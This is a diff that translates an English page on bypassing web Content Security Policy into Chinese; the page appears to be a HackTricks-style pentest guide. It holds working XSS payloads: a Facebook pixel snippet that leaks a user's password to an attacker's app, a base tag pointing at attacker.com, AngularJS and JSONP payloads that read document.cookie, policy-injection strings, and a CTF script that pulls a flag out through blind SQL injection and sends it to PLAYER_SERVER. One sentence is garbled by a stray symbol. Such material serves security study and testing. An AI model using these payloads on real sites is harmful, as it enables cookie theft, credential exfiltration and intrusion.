+如[以下帖子](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses)所述，有许多第三方域名可能在CSP中被允许，可以被滥用以提取数据或执行JavaScript代码。这些第三方中的一些是：
 
-As described in the [following post](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses), there are many third party domains, that might be allowed somewhere in the CSP, can be abused to either exfiltrate data or execute JavaScript code. Some of these third-parties are:
-
-| Entity            | Allowed Domain                               | Capabilities |
-| ----------------- | -------------------------------------------- | ------------ |
-| Facebook          | www.facebook.com, \*.facebook.com            | Exfil        |
-| Hotjar            | \*.hotjar.com, ask.hotjar.io                 | Exfil        |
-| Jsdelivr          | \*.jsdelivr.com, cdn.jsdelivr.net            | Exec         |
-| Amazon CloudFront | \*.cloudfront.net                            | Exfil, Exec  |
-| Amazon AWS        | \*.amazonaws.com                             | Exfil, Exec  |
+| 实体              | 允许的域名                                 | 能力         |
+| ----------------- | ------------------------------------------ | ------------ |
+| Facebook          | www.facebook.com, \*.facebook.com          | Exfil        |
+| Hotjar            | \*.hotjar.com, ask.hotjar.io              | Exfil        |
+| Jsdelivr          | \*.jsdelivr.com, cdn.jsdelivr.net          | Exec         |
+| Amazon CloudFront | \*.cloudfront.net                          | Exfil, Exec  |
+| Amazon AWS        | \*.amazonaws.com                           | Exfil, Exec  |
 | Azure Websites    | \*.azurewebsites.net, \*.azurestaticapps.net | Exfil, Exec  |
-| Salesforce Heroku | \*.herokuapp.com                             | Exfil, Exec  |
-| Google Firebase   | \*.firebaseapp.com                           | Exfil, Exec  |
+| Salesforce Heroku | \*.herokuapp.com                           | Exfil, Exec  |
+| Google Firebase   | \*.firebaseapp.com                         | Exfil, Exec  |
 
-If you find any of the allowed domains in the CSP of your target, chances are that you might be able to bypass the CSP by registering on the third-party service and, either exfiltrate data to that service or to execute code.
-
-For example, if you find the following CSP:
+如果您在目标的CSP中发现任何允许的域名，您可能能够通过在第三方服务上注册来绕过CSP，并将数据提取到该服务或执行代码。
 
+例如，如果您发现以下CSP：
 ```
 Content-Security-Policy​: default-src 'self’ www.facebook.com;​
 ```
-
-or
-
+或
 ```
 Content-Security-Policy​: connect-src www.facebook.com;​
 ```
+您应该能够提取数据，就像一直以来使用 [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/) 一样。在这种情况下，您遵循以下一般步骤：
 
-You should be able to exfiltrate data, similarly as it has always be done with [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/). In this case, you follow these general steps:
-
-1. Create a Facebook Developer account here.
-2. Create a new "Facebook Login" app and select "Website".
-3. Go to "Settings -> Basic" and get your "App ID"
-4. In the target site you want to exfiltrate data from, you can exfiltrate data by directly using the Facebook SDK gadget "fbq" through a "customEvent" and the data payload.
-5. Go to your App "Event Manager" and select the application you created (note the event manager could be found in an URL similar to this: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events
-6. Select the tab "Test Events" to see the events being sent out by "your" web site.
-
-Then, on the victim side, you execute the following code to initialize the Facebook tracking pixel to point to the attacker's Facebook developer account app-id and issue a custom event like this:
+1. 在此处创建一个 Facebook 开发者帐户。
+2. 创建一个新的“Facebook 登录”应用并选择“网站”。
+3. 转到“设置 -> 基本”，获取您的“应用 ID”。
+4. 在您想要提取数据的目标网站中，您可以通过“customEvent”和数据负载直接使用 Facebook SDK 小工具“fbq”来提取数据。
+5. 转到您的应用“事件管理器”，选择您创建的应用（请注意，事件管理器可以在类似于此的 URL 中找到：https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events）。
+6. 选择“测试事件”选项卡，以查看“您的”网站发送的事件。
 
+然后，在受害者一侧，您执行以下代码以初始化 Facebook 跟踪像素，指向攻击者的 Facebook 开发者帐户应用 ID，并发出如下自定义事件：
 ```JavaScript
 fbq('init', '1279785999289471');​ // this number should be the App ID of the attacker's Meta/Facebook account
 fbq('trackCustom', 'My-Custom-Event',{​
-    data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"​
+data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"​
 });
 ```
+至于前表中指定的其他七个第三方域，还有许多其他方法可以滥用它们。有关其他第三方滥用的更多解释，请参阅之前的 [blog post](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses)。
 
-As for the other seven third-party domains specified in the previous table, there are many other ways you can abuse them. Refer to the previously [blog post](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) for additional explanations about other third-party abuses.
+### 通过 RPO（相对路径覆盖）绕过 <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
 
-### Bypass via RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
-
-In addition to the aforementioned redirection to bypass path restrictions, there is another technique called Relative Path Overwrite (RPO) that can be used on some servers.
-
-For example, if CSP allows the path `https://example.com/scripts/react/`, it can be bypassed as follows:
+除了上述重定向以绕过路径限制外，还有一种称为相对路径覆盖（RPO）的技术，可以在某些服务器上使用。
 
+例如，如果 CSP 允许路径 `https://example.com/scripts/react/`，则可以通过以下方式绕过：
 ```html
 <script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
 ```
+浏览器最终将加载 `https://example.com/scripts/angular/angular.js`。
 
-The browser will ultimately load `https://example.com/scripts/angular/angular.js`.
+这有效是因为对于浏览器来说，您正在加载一个名为 `..%2fangular%2fangular.js` 的文件，该文件位于 `https://example.com/scripts/react/` 下，这符合 CSP。
 
-This works because for the browser, you are loading a file named `..%2fangular%2fangular.js` located under `https://example.com/scripts/react/`, which is compliant with CSP.
+∑，它们将解码它，有效地请求 `https://example.com/scripts/react/../angular/angular.js`，这等同于 `https://example.com/scripts/angular/angular.js`。
 
-∑, they will decode it, effectively requesting `https://example.com/scripts/react/../angular/angular.js`, which is equivalent to `https://example.com/scripts/angular/angular.js`.
+通过 **利用浏览器和服务器之间 URL 解释的不一致性，可以绕过路径规则**。
 
-By **exploiting this inconsistency in URL interpretation between the browser and the server, the path rules can be bypassed**.
+解决方案是确保服务器端不将 `%2f` 视为 `/`，以确保浏览器和服务器之间的一致解释，从而避免此问题。
 
-The solution is to not treat `%2f` as `/` on the server-side, ensuring consistent interpretation between the browser and the server to avoid this issue.
+在线示例：[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
 
-Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
-
-### Iframes JS execution
+### Iframes JS 执行
 
 {{#ref}}
 ../xss-cross-site-scripting/iframes-in-xss-and-csp.md
 {{#endref}}
 
-### missing **base-uri**
+### 缺少 **base-uri**
 
-If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/).
-
-Moreover, if the **page is loading a script using a relative path** (like `<script src="/js/app.js">`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
-If the vulnerable page is loaded with **httpS**, make use an httpS url in the base.
+如果缺少 **base-uri** 指令，您可以利用它执行 [**悬挂标记注入**](../dangling-markup-html-scriptless-injection/)。
 
+此外，如果 **页面使用相对路径加载脚本**（如 `<script src="/js/app.js">`）并使用 **Nonce**，您可以利用 **base** **标签** 使其 **从您自己的服务器加载** 脚本，从而实现 XSS。\
+如果易受攻击的页面使用 **httpS** 加载，请在 base 中使用 httpS URL。
 ```html
 <base href="https://www.attacker.com/" />
 ```
+### AngularJS 事件
 
-### AngularJS events
-
-A specific policy known as Content Security Policy (CSP) may restrict JavaScript events. Nonetheless, AngularJS introduces custom events as an alternative. Within an event, AngularJS provides a unique object `$event`, referencing the native browser event object. This `$event` object can be exploited to circumvent the CSP. Notably, in Chrome, the `$event/event` object possesses a `path` attribute, holding an object array implicated in the event's execution chain, with the `window` object invariably positioned at the end. This structure is pivotal for sandbox escape tactics.
-
-By directing this array to the `orderBy` filter, it's possible to iterate over it, harnessing the terminal element (the `window` object) to trigger a global function like `alert()`. The demonstrated code snippet below elucidates this process:
+一个特定的政策称为内容安全政策 (CSP) 可能会限制 JavaScript 事件。然而，AngularJS 引入了自定义事件作为替代。在事件中，AngularJS 提供了一个独特的对象 `$event`，引用原生浏览器事件对象。这个 `$event` 对象可以被利用来规避 CSP。值得注意的是，在 Chrome 中，`$event/event` 对象具有一个 `path` 属性，包含一个对象数组，涉及事件的执行链，`window` 对象始终位于末尾。这个结构对于沙箱逃逸策略至关重要。
 
+通过将这个数组传递给 `orderBy` 过滤器，可以对其进行迭代，利用终端元素（`window` 对象）触发一个全局函数，如 `alert()`。下面的代码片段阐明了这个过程：
 ```xml
 <input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
 ?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
 ```
+该代码片段强调了使用 `ng-focus` 指令触发事件，利用 `$event.path|orderBy` 操作 `path` 数组，并利用 `window` 对象执行 `alert()` 函数，从而揭示 `document.cookie`。
 
-This snippet highlights the usage of the `ng-focus` directive to trigger the event, employing `$event.path|orderBy` to manipulate the `path` array, and leveraging the `window` object to execute the `alert()` function, thereby revealing `document.cookie`.
-
-**Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
-
-### AngularJS and whitelisted domain
+**在** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) **中查找其他 Angular 绕过方法**
 
+### AngularJS 和白名单域名
 ```
 Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
 ```
+在Angular JS应用程序中，允许脚本加载的CSP策略可以通过调用回调函数和某些易受攻击的类来绕过。有关此技术的更多信息，请参阅此[git repository](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22)上的详细指南。
 
-A CSP policy that whitelists domains for script loading in an Angular JS application can be bypassed through the invocation of callback functions and certain vulnerable classes. Further information on this technique can be found in a detailed guide available on this [git repository](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22).
-
-Working payloads:
-
+有效的有效载荷：
 ```html
 <script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
 ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
@@ -467,373 +408,338 @@ ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com
 <!-- no longer working -->
 <script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
 ```
+其他 JSONP 任意执行端点可以在 [**这里**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) 找到（其中一些已被删除或修复）
 
-Other JSONP arbitrary execution endpoints can be found in [**here**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) (some of them were deleted or fixed)
+### 通过重定向绕过
 
-### Bypass via Redirection
+当 CSP 遇到服务器端重定向时会发生什么？如果重定向导致到一个不被允许的不同源，它仍然会失败。
 
-What happens when CSP encounters server-side redirection? If the redirection leads to a different origin that is not allowed, it will still fail.
-
-However, according to the description in [CSP spec 4.2.2.3. Paths and Redirects](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects), if the redirection leads to a different path, it can bypass the original restrictions.
-
-Here's an example:
+然而，根据 [CSP 规范 4.2.2.3. 路径和重定向](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects) 中的描述，如果重定向导致到一个不同的路径，它可以绕过原始限制。
 
+这是一个例子：
 ```html
 <!DOCTYPE html>
 <html>
-  <head>
-    <meta
-      http-equiv="Content-Security-Policy"
-      content="script-src http://localhost:5555 https://www.google.com/a/b/c/d" />
-  </head>
-  <body>
-    <div id="userContent">
-      <script src="https://https://www.google.com/test"></script>
-      <script src="https://https://www.google.com/a/test"></script>
-      <script src="http://localhost:5555/301"></script>
-    </div>
-  </body>
+<head>
+<meta
+http-equiv="Content-Security-Policy"
+content="script-src http://localhost:5555 https://www.google.com/a/b/c/d" />
+</head>
+<body>
+<div id="userContent">
+<script src="https://https://www.google.com/test"></script>
+<script src="https://https://www.google.com/a/test"></script>
+<script src="http://localhost:5555/301"></script>
+</div>
+</body>
 </html>
 ```
+如果 CSP 设置为 `https://www.google.com/a/b/c/d`，由于路径被考虑，`/test` 和 `/a/test` 脚本将被 CSP 阻止。
 
-If CSP is set to `https://www.google.com/a/b/c/d`, since the path is considered, both `/test` and `/a/test` scripts will be blocked by CSP.
+然而，最终的 `http://localhost:5555/301` 将在服务器端 **重定向到 `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**。由于这是一个重定向，**路径不被考虑**，因此 **脚本可以被加载**，从而绕过路径限制。
 
-However, the final `http://localhost:5555/301` will be **redirected on the server-side to `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**. Since it is a redirection, the **path is not considered**, and the **script can be loaded**, thus bypassing the path restriction.
+通过这种重定向，即使路径完全指定，仍然会被绕过。
 
-With this redirection, even if the path is specified completely, it will still be bypassed.
+因此，最佳解决方案是确保网站没有任何开放重定向漏洞，并且 CSP 规则中没有可以被利用的域。
 
-Therefore, the best solution is to ensure that the website does not have any open redirect vulnerabilities and that there are no domains that can be exploited in the CSP rules.
+### 通过悬挂标记绕过 CSP
 
-### Bypass CSP with dangling markup
-
-Read [how here](../dangling-markup-html-scriptless-injection/).
-
-### 'unsafe-inline'; img-src \*; via XSS
+阅读 [how here](../dangling-markup-html-scriptless-injection/)。
 
+### 'unsafe-inline'; img-src \*; 通过 XSS
 ```
 default-src 'self' 'unsafe-inline'; img-src *;
 ```
+`'unsafe-inline'` 意味着您可以在代码中执行任何脚本（XSS 可以执行代码），而 `img-src *` 意味着您可以在网页中使用来自任何资源的任何图像。
 
-`'unsafe-inline'` means that you can execute any script inside the code (XSS can execute code) and `img-src *` means that you can use in the webpage any image from any resource.
-
-You can bypass this CSP by exfiltrating the data via images (in this occasion the XSS abuses a CSRF where a page accessible by the bot contains an SQLi, and extract the flag via an image):
-
+您可以通过图像泄露数据来绕过此 CSP（在这种情况下，XSS 利用一个可由机器人访问的页面中的 CSRF，该页面包含 SQLi，并通过图像提取标志）：
 ```javascript
 <script>
-  fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new
-  Image().src='http://PLAYER_SERVER/?'+_)
+fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new
+Image().src='http://PLAYER_SERVER/?'+_)
 </script>
 ```
+来自: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
 
-From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
+您还可以利用此配置来**加载插入在图像中的javascript代码**。例如，如果页面允许从Twitter加载图像。您可以**制作**一个**特殊图像**，**上传**到Twitter，并利用“**unsafe-inline**”来**执行**一段JS代码（作为常规XSS），该代码将**加载**该**图像**，**提取**其中的**JS**并**执行**它：[https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
 
-You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows loading images from Twitter. You could **craft** an **special image**, **upload** it to Twitter and abuse the "**unsafe-inline**" to **execute** a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
+### 使用服务工作者
 
-### With Service Workers
-
-Service workers **`importScripts`** function isn't limited by CSP:
+服务工作者的**`importScripts`**函数不受CSP限制：
 
 {{#ref}}
 ../xss-cross-site-scripting/abusing-service-workers.md
 {{#endref}}
 
-### Policy Injection
+### 策略注入
 
-**Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)
+**研究：** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)
 
 #### Chrome
 
-If a **parameter** sent by you is being **pasted inside** the **declaration** of the **policy,** then you could **alter** the **policy** in some way that makes **it useless**. You could **allow script 'unsafe-inline'** with any of these bypasses:
-
+如果您发送的**参数**被**粘贴到****策略的声明**中，那么您可以以某种方式**更改**该**策略**使其**无效**。您可以通过以下任一绕过方法**允许脚本 'unsafe-inline'**：
 ```bash
 script-src-elem *; script-src-attr *
 script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
 ```
-
-Because this directive will **overwrite existing script-src directives**.\
-You can find an example here: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
+因为这个指令将**覆盖现有的script-src指令**。\
+你可以在这里找到一个例子：[http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
 
 #### Edge
 
-In Edge is much simpler. If you can add in the CSP just this: **`;_`** **Edge** would **drop** the entire **policy**.\
-Example: [http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](<http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E>)
+在Edge中要简单得多。如果你可以在CSP中添加这个：**`;_`** **Edge**将**丢弃**整个**策略**。\
+例子：[http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](<http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E>)
 
-### img-src \*; via XSS (iframe) - Time attack
+### img-src \*; 通过XSS（iframe）- 时间攻击
 
-Notice the lack of the directive `'unsafe-inline'`\
-This time you can make the victim **load** a page in **your control** via **XSS** with a `<iframe`. This time you are going to make the victim access the page from where you want to extract information (**CSRF**). You cannot access the content of the page, but if somehow you can **control the time the page needs to load** you can extract the information you need.
-
-This time a **flag** is going to be extracted, whenever a **char is correctly guessed** via SQLi the **response** takes **more time** due to the sleep function. Then, you will be able to extract the flag:
+注意缺少指令`'unsafe-inline'`\
+这次你可以让受害者通过**XSS**加载一个在**你控制**下的页面，使用一个`<iframe`。这次你将让受害者访问你想要提取信息的页面（**CSRF**）。你无法访问页面的内容，但如果你能**控制页面加载所需的时间**，你就可以提取所需的信息。
 
+这次将提取一个**标志**，每当通过SQLi**正确猜测一个字符**时，**响应**由于睡眠函数而**花费更多时间**。然后，你将能够提取标志：
 ```html
 <!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
 <iframe name="f" id="g"></iframe> // The bot will load an URL with the payload
 <script>
-  let host = "http://x-oracle-v1.nn9ed.ka0labs.org"
-  function gen(x) {
-    x = escape(x.replace(/_/g, "\\_"))
-    return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23`
-  }
+let host = "http://x-oracle-v1.nn9ed.ka0labs.org"
+function gen(x) {
+x = escape(x.replace(/_/g, "\\_"))
+return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23`
+}
 
-  function gen2(x) {
-    x = escape(x)
-    return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23`
-  }
+function gen2(x) {
+x = escape(x)
+return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23`
+}
 
-  async function query(word, end = false) {
-    let h = performance.now()
-    f.location = end ? gen2(word) : gen(word)
-    await new Promise((r) => {
-      g.onload = r
-    })
-    let diff = performance.now() - h
-    return diff > 300
-  }
+async function query(word, end = false) {
+let h = performance.now()
+f.location = end ? gen2(word) : gen(word)
+await new Promise((r) => {
+g.onload = r
+})
+let diff = performance.now() - h
+return diff > 300
+}
 
-  let alphabet = "_abcdefghijklmnopqrstuvwxyz0123456789".split("")
-  let postfix = "}"
+let alphabet = "_abcdefghijklmnopqrstuvwxyz0123456789".split("")
+let postfix = "}"
 
-  async function run() {
-    let prefix = "nn9ed{"
-    while (true) {
-      let i = 0
-      for (i; i < alphabet.length; i++) {
-        let c = alphabet[i]
-        let t = await query(prefix + c) // Check what chars returns TRUE or FALSE
-        console.log(prefix, c, t)
-        if (t) {
-          console.log("FOUND!")
-          prefix += c
-          break
-        }
-      }
-      if (i == alphabet.length) {
-        console.log("missing chars")
-        break
-      }
-      let t = await query(prefix + "}", true)
-      if (t) {
-        prefix += "}"
-        break
-      }
-    }
-    new Image().src = "http://PLAYER_SERVER/?" + prefix //Exfiltrate the flag
-    console.log(prefix)
-  }
+async function run() {
+let prefix = "nn9ed{"
+while (true) {
+let i = 0
+for (i; i < alphabet.length; i++) {
+let c = alphabet[i]
+let t = await query(prefix + c) // Check what chars returns TRUE or FALSE
+console.log(prefix, c, t)
+if (t) {
+console.log("FOUND!")
+prefix += c
+break
+}
+}
+if (i == alphabet.length) {
+console.log("missing chars")
+break
+}
+let t = await query(prefix + "}", true)
+if (t) {
+prefix += "}"
+break
+}
+}
+new Image().src = "http://PLAYER_SERVER/?" + prefix //Exfiltrate the flag
+console.log(prefix)
+}
 
-  run()
+run()
 </script>
 ```
+### 通过书签小程序
 
-### Via Bookmarklets
+此攻击将涉及一些社会工程学，攻击者**说服用户将链接拖放到浏览器的书签小程序上**。此书签小程序将包含**恶意的javascript**代码，当被拖放或点击时，将在当前网页窗口的上下文中执行，**绕过CSP并允许窃取敏感信息**，例如cookies或tokens。
 
-This attack would imply some social engineering where the attacker **convinces the user to drag and drop a link over the bookmarklet of the browser**. This bookmarklet would contain **malicious javascript** code that when drag\&dropped or clicked would be executed in the context of the current web window, **bypassing CSP and allowing to steal sensitive information** such as cookies or tokens.
+有关更多信息，请[**查看原始报告**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/)。
 
-For more information [**check the original report here**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).
+### 通过限制CSP绕过CSP
 
-### CSP bypass by restricting CSP
-
-In [**this CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP is bypassed by injecting inside an allowed iframe a more restrictive CSP that disallowed to load a specific JS file that, then, via **prototype pollution** or **dom clobbering** allowed to **abuse a different script to load an arbitrary script**.
-
-You can **restrict a CSP of an Iframe** with the **`csp`** attribute:
+在[**这个CTF写作**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution)中，CSP通过在允许的iframe内注入更严格的CSP来绕过，该CSP不允许加载特定的JS文件，然后通过**原型污染**或**DOM覆盖**允许**滥用不同的脚本来加载任意脚本**。
 
+您可以使用**`csp`**属性**限制iframe的CSP**：
 ```html
 <iframe
-  src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]"
-  csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe>
+src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]"
+csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe>
 ```
-
-In [**this CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), it was possible via **HTML injection** to **restrict** more a **CSP** so a script preventing CSTI was disabled and therefore the **vulnerability became exploitable.**\
-CSP can be made more restrictive using **HTML meta tags** and inline scripts can disabled **removing** the **entry** allowing their **nonce** and **enable specific inline script via sha**:
-
+在 [**这个 CTF 写作**](https://github.com/aszx87410/ctf-writeups/issues/48) 中，通过 **HTML 注入** 可以 **进一步限制** **CSP**，从而禁用防止 CSTI 的脚本，因此 **漏洞变得可利用。**\
+可以使用 **HTML 元标签** 使 CSP 更加严格，并且可以通过 **移除** 允许其 **nonce** 的 **入口** 来禁用内联脚本，并通过 sha **启用特定的内联脚本**：
 ```html
 <meta
-  http-equiv="Content-Security-Policy"
-  content="script-src 'self'
+http-equiv="Content-Security-Policy"
+content="script-src 'self'
 'unsafe-eval' 'strict-dynamic'
 'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4='
 'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';" />
 ```
-
 ### JS exfiltration with Content-Security-Policy-Report-Only
 
-If you can manage to make the server responds with the header **`Content-Security-Policy-Report-Only`** with a **value controlled by you** (maybe because of a CRLF), you could make it point your server and if you **wraps** the **JS content** you want to exfiltrate with **`<script>`** and because highly probable `unsafe-inline` isn't allowed by the CSP, this will **trigger a CSP error** and part of the script (containing the sensitive info) will be sent to the server from `Content-Security-Policy-Report-Only`.
+如果你能够使服务器响应带有 **`Content-Security-Policy-Report-Only`** 头部且 **值由你控制**（可能是因为 CRLF），你可以使其指向你的服务器，并且如果你 **将** 你想要泄露的 **JS 内容** 包裹在 **`<script>`** 中，并且因为 CSP 很可能不允许 `unsafe-inline`，这将 **触发 CSP 错误**，并且部分脚本（包含敏感信息）将从 `Content-Security-Policy-Report-Only` 发送到服务器。
 
-For an example [**check this CTF writeup**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).
+对于示例 [**查看这个 CTF 写作**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes)。
 
 ### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
-
 ```javascript
 document.querySelector("DIV").innerHTML =
-  '<iframe src=\'javascript:var s = document.createElement("script");s.src = "https://pastebin.com/raw/dw5cWGK6";document.body.appendChild(s);\'></iframe>'
+'<iframe src=\'javascript:var s = document.createElement("script");s.src = "https://pastebin.com/raw/dw5cWGK6";document.body.appendChild(s);\'></iframe>'
 ```
+### 利用CSP和Iframe泄露信息
 
-### Leaking Information with CSP and Iframe
+- 创建一个指向一个URL的`iframe`（我们称之为`https://example.redirect.com`），该URL被CSP允许。
+- 该URL随后重定向到一个秘密URL（例如，`https://usersecret.example2.com`），该URL在CSP中**不被允许**。
+- 通过监听`securitypolicyviolation`事件，可以捕获`blockedURI`属性。该属性揭示了被阻止的URI的域名，从而泄露了初始URL重定向的秘密域名。
 
-- An `iframe` is created that points to a URL (let's call it `https://example.redirect.com`) which is permitted by CSP.
-- This URL then redirects to a secret URL (e.g., `https://usersecret.example2.com`) that is **not allowed** by CSP.
-- By listening to the `securitypolicyviolation` event, one can capture the `blockedURI` property. This property reveals the domain of the blocked URI, leaking the secret domain to which the initial URL redirected.
-
-It's interesting to note that browsers like Chrome and Firefox have different behaviors in handling iframes with respect to CSP, leading to potential leakage of sensitive information due to undefined behavior.
-
-Another technique involves exploiting the CSP itself to deduce the secret subdomain. This method relies on a binary search algorithm and adjusting the CSP to include specific domains that are deliberately blocked. For example, if the secret subdomain is composed of unknown characters, you can iteratively test different subdomains by modifying the CSP directive to block or allow these subdomains. Here’s a snippet showing how the CSP might be set up to facilitate this method:
+有趣的是，像Chrome和Firefox这样的浏览器在处理与CSP相关的iframes时表现不同，可能导致由于未定义行为而泄露敏感信息。
 
+另一种技术涉及利用CSP本身推断秘密子域。该方法依赖于二分搜索算法，并调整CSP以包含故意被阻止的特定域。例如，如果秘密子域由未知字符组成，可以通过修改CSP指令来阻止或允许这些子域，逐步测试不同的子域。以下是一个片段，展示了如何设置CSP以促进此方法：
 ```markdown
 img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
 ```
+通过监控哪些请求被CSP阻止或允许，可以缩小秘密子域名中可能的字符，最终揭示完整的URL。
 
-By monitoring which requests are blocked or allowed by the CSP, one can narrow down the possible characters in the secret subdomain, eventually uncovering the full URL.
-
-Both methods exploit the nuances of CSP implementation and behavior in browsers, demonstrating how seemingly secure policies can inadvertently leak sensitive information.
+这两种方法利用了CSP在浏览器中的实现和行为的细微差别，展示了看似安全的策略如何无意中泄露敏感信息。
 
 Trick from [**here**](https://ctftime.org/writeup/29310).
 
